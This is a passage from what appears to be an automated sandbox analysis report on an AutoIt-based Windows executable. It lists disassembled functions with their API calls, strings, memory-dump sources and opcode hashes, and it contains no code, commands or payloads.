                                                                                                                        Function 00EAB482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00EAB4A8
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00EAB5B7
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00EAB73A
                                                                                                                          • Part of subcall function 00E9A6F6: VariantInit.OLEAUT32(00000000), ref: 00E9A736
                                                                                                                          • Part of subcall function 00E9A6F6: VariantCopy.OLEAUT32(?,?), ref: 00E9A73F
                                                                                                                          • Part of subcall function 00E9A6F6: VariantClear.OLEAUT32(?), ref: 00E9A74B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                        • API String ID: 4237274167-1221869570
                                                                                                                        • Opcode ID: e5fc5282999e1da90cda37e442bcacaaa2225399430e9ac1fece633550d61624
                                                                                                                        • Instruction ID: a742e4a9cf2de30f92dfe1137025107fe007f42a3690620c7787cdaa37e9eb91
                                                                                                                        • Opcode Fuzzy Hash: e5fc5282999e1da90cda37e442bcacaaa2225399430e9ac1fece633550d61624
                                                                                                                        • Instruction Fuzzy Hash: 84919F706083019FCB10DF24C88495ABBF5EFC9704F14596DF89AAB362DB31E949CB52
                                                                                                                        Function 00E95D65 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E53BCF: _wcscpy.LIBCMT ref: 00E53BF2
                                                                                                                        • _memset.LIBCMT ref: 00E95E56
                                                                                                                        • GetMenuItemInfoW.USER32(?), ref: 00E95E85
                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E95F31
                                                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E95F5B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 4152858687-4108050209
                                                                                                                        • Opcode ID: 27f12653ff74509a6b0ded85a7df24694a971fee6a386fc7d603e0a890df8a64
                                                                                                                        • Instruction ID: 4a2048182017f25b22563e48f1667b28a442fd6d54b25d02312b5d8138facdb8
                                                                                                                        • Opcode Fuzzy Hash: 27f12653ff74509a6b0ded85a7df24694a971fee6a386fc7d603e0a890df8a64
                                                                                                                        • Instruction Fuzzy Hash: 075105736187019ADB169B28C844AABB7E4EF45328F082A2EF995F31D0DB70CD448792
                                                                                                                        Function 00E91050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E910B8
                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E910EE
                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E910FF
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E91181
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                        • String ID: DllGetClassObject
                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                        • Opcode ID: 62348466fb1008419ecbe9c6d9d086940e824fd316f08e38675fac94cfec6b48
                                                                                                                        • Instruction ID: da23628e95b8eb7592b7e869df3844ec7129c0ad7c99c98c11b7f7fa43b77df8
                                                                                                                        • Opcode Fuzzy Hash: 62348466fb1008419ecbe9c6d9d086940e824fd316f08e38675fac94cfec6b48
                                                                                                                        • Instruction Fuzzy Hash: F3418D71602206EFDF05CF56CC84B9A7BA9EF44354F1490EAEA09EF216D7B1D944CBA0
                                                                                                                        Function 00E95A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E95A93
                                                                                                                        • GetMenuItemInfoW.USER32 ref: 00E95AAF
                                                                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00E95AF5
                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F118F0,00000000), ref: 00E95B3E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 1173514356-4108050209
                                                                                                                        • Opcode ID: fa2eaec41bf38ecd027a3069a13e6ee758d21453f8dfd4b5fa894ccbcdfb8fd4
                                                                                                                        • Instruction ID: 2edae5484da7782c1bb93d3ec4bdea146892219846715c9c8d3e1643b9b794eb
                                                                                                                        • Opcode Fuzzy Hash: fa2eaec41bf38ecd027a3069a13e6ee758d21453f8dfd4b5fa894ccbcdfb8fd4
                                                                                                                        • Instruction Fuzzy Hash: B641C2322057019FDB11DF24D881B5AB7E8EF89324F045A1EF9A5AB2D1E770E804CB66
                                                                                                                        Function 00EB0458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00EB0478
                                                                                                                          • Part of subcall function 00E57F40: _memmove.LIBCMT ref: 00E57F8F
                                                                                                                          • Part of subcall function 00E5A2FB: _memmove.LIBCMT ref: 00E5A33D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$BuffCharLower
                                                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                                                        • API String ID: 2411302734-567219261
                                                                                                                        • Opcode ID: 5008c5ec6ad227d7a3afd40de084bbfc9889423412f7e39021693da14d7a8e41
                                                                                                                        • Instruction ID: fc2c12127b26d66fd8a765321469daf0404544f05a5048a533ce9735c17e17dc
                                                                                                                        • Opcode Fuzzy Hash: 5008c5ec6ad227d7a3afd40de084bbfc9889423412f7e39021693da14d7a8e41
                                                                                                                        • Instruction Fuzzy Hash: 4431AD70500619ABCF24EF98D8419EFB3F5FF05364B109A29E862BB6D1CB31E909CB40
                                                                                                                        Function 00E8C600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E8C684
                                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E8C697
                                                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E8C6C7
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 458670788-1403004172
                                                                                                                        • Opcode ID: a37f0132d188b11de63a5b1ecf2d9e2503b03fa4433b4c49d4a6a53e3d1dec07
                                                                                                                        • Instruction ID: 84742535c59a0de1fe4e5e02846f6ee3da0b079dea9862e304da22e99f127b48
                                                                                                                        • Opcode Fuzzy Hash: a37f0132d188b11de63a5b1ecf2d9e2503b03fa4433b4c49d4a6a53e3d1dec07
                                                                                                                        • Instruction Fuzzy Hash: C721F671900104BEDB04BB64DC86DFFB7A8DF46714B206529F42AF31E1EB744D0AA760
                                                                                                                        Function 00EA4A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EA4A60
                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EA4A86
                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EA4AB6
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00EA4AFD
                                                                                                                          • Part of subcall function 00EA56A9: GetLastError.KERNEL32(?,?,00EA4A2B,00000000,00000000,00000001), ref: 00EA56BE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1951874230-3916222277
                                                                                                                        • Opcode ID: 9c96ff75b2afb2f0c740930b7f762b33fd17ff5705362029c28fc3403f40ac9e
                                                                                                                        • Instruction ID: 20bf22e8ae2e0e2e775578cf95dee833b58c92d5d4905b44a84c8021b83bf33f
                                                                                                                        • Opcode Fuzzy Hash: 9c96ff75b2afb2f0c740930b7f762b33fd17ff5705362029c28fc3403f40ac9e
                                                                                                                        • Instruction Fuzzy Hash: FA21B0B6544208BFE711DF659C85EBB77ECEB8E748F10511BF105BA180EAA4AD054770
                                                                                                                        Function 00E538E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EC454E
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        • _memset.LIBCMT ref: 00E53965
                                                                                                                        • _wcscpy.LIBCMT ref: 00E539B5
                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E539C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                        • String ID: Line:
                                                                                                                        • API String ID: 3942752672-1585850449
                                                                                                                        • Opcode ID: 4cf6e0f381b27b796227fd7990092562b7a92f7734aa9ab77a1ac0157615edf6
                                                                                                                        • Instruction ID: 5c54212c96c8eae0f233af4d69f8dcc013ef9be90d5194852424228404353438
                                                                                                                        • Opcode Fuzzy Hash: 4cf6e0f381b27b796227fd7990092562b7a92f7734aa9ab77a1ac0157615edf6
                                                                                                                        • Instruction Fuzzy Hash: CD31B9714083446BD721EB60DC41FDB77E8BF84351F00991EFA85A21A1DB709B4CD792
                                                                                                                        Function 00EB8EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E6C657
                                                                                                                          • Part of subcall function 00E6C619: GetStockObject.GDI32(00000011), ref: 00E6C66B
                                                                                                                          • Part of subcall function 00E6C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E6C675
                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EB8F69
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00EB8F70
                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EB8F85
                                                                                                                        • DestroyWindow.USER32(?), ref: 00EB8F8D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                        • String ID: SysAnimate32
                                                                                                                        • API String ID: 4146253029-1011021900
                                                                                                                        • Opcode ID: 8a84d6b4d20095318df33b8a81abef8f501833024218f5ccf250c00726342911
                                                                                                                        • Instruction ID: d9e049b946d7493b9b4e15c4b6cc8ca694e6e0b3cf346cb3962e73c1b9d7b536
                                                                                                                        • Opcode Fuzzy Hash: 8a84d6b4d20095318df33b8a81abef8f501833024218f5ccf250c00726342911
                                                                                                                        • Instruction Fuzzy Hash: 41218B71204209AFEF105E64ED44EFB37AEEB49368F106629FA54A7290CB71DC50D760
                                                                                                                        Function 00E99E65 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00E99E85
                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E99EB6
                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00E99EC8
                                                                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E99F02
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHandle$FilePipe
                                                                                                                        • String ID: nul
                                                                                                                        • API String ID: 4209266947-2873401336
                                                                                                                        • Opcode ID: d74c6d19dfab87c138f55c733b90602945f6206000ee28c5ba6d739773520a42
                                                                                                                        • Instruction ID: adaea6527d7ef0a6c9351c343d0b89affae16ac9f8ca2a05be2de4a0cb5b1dd8
                                                                                                                        • Opcode Fuzzy Hash: d74c6d19dfab87c138f55c733b90602945f6206000ee28c5ba6d739773520a42
                                                                                                                        • Instruction Fuzzy Hash: 9B213970600305AFDF209F29DC05A9ABBE8EF94724F205A1DF8A5E72E1EB709944CB50
                                                                                                                        Function 00E9E382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00E9E392
                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00E9E3E6
                                                                                                                        • __swprintf.LIBCMT ref: 00E9E3FF
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00EEDBF0), ref: 00E9E43D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                        • String ID: %lu
                                                                                                                        • API String ID: 3164766367-685833217
                                                                                                                        • Opcode ID: cf55cdc58a843e7a66d9fc9fdd5a39ec071ed27f90a24b1a38db09c7b3cf44bd
                                                                                                                        • Instruction ID: 1f2e0956db48f9a69645617f1b3bcea157e0f5b48cdf967394fd1212b0a686ff
                                                                                                                        • Opcode Fuzzy Hash: cf55cdc58a843e7a66d9fc9fdd5a39ec071ed27f90a24b1a38db09c7b3cf44bd
                                                                                                                        • Instruction Fuzzy Hash: E2217F35A40208AFCB10EBA5CC85DEEBBB8EF59705B104069F919F7252D631DA05CB60
                                                                                                                        Function 00E8D7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                          • Part of subcall function 00E8D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E8D640
                                                                                                                          • Part of subcall function 00E8D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E8D653
                                                                                                                          • Part of subcall function 00E8D623: GetCurrentThreadId.KERNEL32 ref: 00E8D65A
                                                                                                                          • Part of subcall function 00E8D623: AttachThreadInput.USER32(00000000), ref: 00E8D661
                                                                                                                        • GetFocus.USER32 ref: 00E8D7FB
                                                                                                                          • Part of subcall function 00E8D66C: GetParent.USER32(?), ref: 00E8D67A
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00E8D844
                                                                                                                        • EnumChildWindows.USER32(?,00E8D8BA), ref: 00E8D86C
                                                                                                                        • __swprintf.LIBCMT ref: 00E8D886
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                        • String ID: %s%d
                                                                                                                        • API String ID: 1941087503-1110647743
                                                                                                                        • Opcode ID: 51cfdcb3a64b8b377528381d649ed87e05e734abc2aef669c747b449f971aea1
                                                                                                                        • Instruction ID: 747f38d745365590997fc56b175011f950991740596aa1f1adfee2f4f8545175
                                                                                                                        • Opcode Fuzzy Hash: 51cfdcb3a64b8b377528381d649ed87e05e734abc2aef669c747b449f971aea1
                                                                                                                        • Instruction Fuzzy Hash: B811B4715082096FDB117F50AC86FEE37A9AB44704F0050B9BE0DBA186DB7499459B70
                                                                                                                        Function 00E78724 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 00E78768
                                                                                                                          • Part of subcall function 00E78984: __mtinitlocknum.LIBCMT ref: 00E78996
                                                                                                                          • Part of subcall function 00E78984: EnterCriticalSection.KERNEL32(00E70127,?,00E7876D,0000000D), ref: 00E789AF
                                                                                                                        • InterlockedIncrement.KERNEL32(DC840F00), ref: 00E78775
                                                                                                                        • __lock.LIBCMT ref: 00E78789
                                                                                                                        • ___addlocaleref.LIBCMT ref: 00E787A7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                        • String ID: P
                                                                                                                        • API String ID: 1687444384-1343716551
                                                                                                                        • Opcode ID: 5d37b7ce4779e74ef424f60c36643973b492e880d1e060b8e357ec05a159c8aa
                                                                                                                        • Instruction ID: 758b0d7adc21c287398f8ae804f0c7b662ae4eabb727c41e749614ee6b6d3426
                                                                                                                        • Opcode Fuzzy Hash: 5d37b7ce4779e74ef424f60c36643973b492e880d1e060b8e357ec05a159c8aa
                                                                                                                        • Instruction Fuzzy Hash: 42015771441B00AEE720EF65D90A75AB7F0EF50726F20990EE49EA72A0DB70A644DB02
                                                                                                                        Function 00EB1836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
